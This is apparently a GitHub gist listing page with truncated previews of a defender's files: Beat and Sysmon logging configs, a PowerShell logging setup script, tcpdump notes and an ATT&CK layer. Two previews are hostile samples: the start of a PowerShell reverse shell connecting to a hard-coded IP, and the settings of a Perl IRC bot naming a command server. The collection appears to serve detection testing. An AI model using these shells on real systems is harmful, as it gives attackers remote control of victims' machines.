duzvik
duzvik
/ auditbeat.yml
Created
December 11, 2024 17:49
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| auditbeat.modules: | |
| - module: auditd | |
| audit_rules: | | |
| -w /var/log/audit/ -k auditlog | |
| ## Auditd configuration | |
| ### Modifications to audit configuration that occur while the audit collection functions are operating | |
| -w /etc/audit/ -p wa -k auditconfig | |
| -w /etc/libaudit.conf -p wa -k auditconfig | |
| -w /etc/audisp/ -p wa -k audispconfig |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| winlogbeat.event_logs: | |
| - name: Application | |
| ignore_older: 240m | |
| - name: Security | |
| ignore_older: 240m | |
| - name: System | |
| ignore_older: 240m | |
| - name: Microsoft-windows-sysmon/operational | |
| ignore_older: 240m | |
| - name: Microsoft-windows-PowerShell/Operational |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- NOTICE : This is a balanced generated output of Sysmon-modular with medium verbosity --> | |
| <!-- due to the balanced nature of this configuration there will be potential blind spots --> | |
| <!-- for more information go to https://github.com/olafhartong/sysmon-modular/wiki --> | |
| <!-- --> | |
| <!-- //** ***// --> | |
| <!-- ///#(** **%(/// --> | |
| <!-- ((&&&** **&&&(( --> | |
| <!-- (&&&** ,(((((((. **&&&( |
duzvik
/ Enable-PowerShell-Logging.ps1
Created
June 24, 2024 10:29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Enable PowerShell Logging | |
| $regConfig = @" | |
| regKey,name,value,type | |
| "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging","EnableScriptBlockLogging",1,"DWORD" | |
| "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging","EnableScriptBlockInvocationLogging",1,"DWORD" | |
| "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging","EnableModuleLogging",1,"DWORD" | |
| "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames",*,*,"String" | |
| "@ | |
| Write-host "Setting up PowerShell registry settings.." |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $socket = new-object System.Net.Sockets.TcpClient('20.118.35.60', 80); | |
| if($socket -eq $null){exit 1} | |
| $stream = $socket.GetStream(); | |
| $writer = new-object System.IO.StreamWriter($stream); | |
| $buffer = new-object System.Byte[] 1024; | |
| $encoding = new-object System.Text.AsciiEncoding; | |
| do | |
| { | |
| $writer.Flush(); | |
| $read = $null; |
duzvik
/ tcp_flags.txt
Created
December 13, 2022 15:18
— forked from tuxfight3r/tcp_flags.txt
tcpdump - reading tcp flags
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##TCP FLAGS## | |
| Unskilled Attackers Pester Real Security Folks | |
| ============================================== | |
| TCPDUMP FLAGS | |
| Unskilled = URG = (Not Displayed in Flag Field, Displayed elsewhere) | |
| Attackers = ACK = (Not Displayed in Flag Field, Displayed elsewhere) | |
| Pester = PSH = [P] (Push Data) | |
| Real = RST = [R] (Reset Connection) | |
| Security = SYN = [S] (Start Connection) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "name": "CERT-UA#3787", | |
| "versions": { | |
| "attack": "10", | |
| "navigator": "4.5.5", | |
| "layer": "4.3" | |
| }, | |
| "domain": "mitre-enterprise", | |
| "description": "", | |
| "filters": { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| my $processo = 'rsync'; | |
| $servidor='45.9.148.99' unless $servidor; | |
| my $porta='443'; | |
| my @canais=("#007"); | |
| my @adms=("polly","molly"); | |
| my @auth=("localhost"); | |
| my $linas_max=6; | |
| my $sleep=3; |
duzvik
/ winlogbeat.yml
Created
November 3, 2021 17:11
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| winlogbeat.event_logs: | |
| - name: Application | |
| ignore_older: 30m | |
| - name: Security | |
| ignore_older: 30m | |
| - name: System | |
| ignore_older: 30m | |
| - name: Microsoft-windows-sysmon/operational | |
| ignore_older: 30m | |
| - name: Microsoft-windows-PowerShell/Operational |
duzvik
/ colortext.svg
Last active
October 29, 2021 13:54
— forked from CyberShadow/colortext.svg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
NewerOlder